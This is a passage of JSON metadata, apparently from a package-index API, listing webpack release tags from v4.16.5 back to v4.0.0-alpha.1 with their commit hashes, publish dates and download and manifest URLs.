nload_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G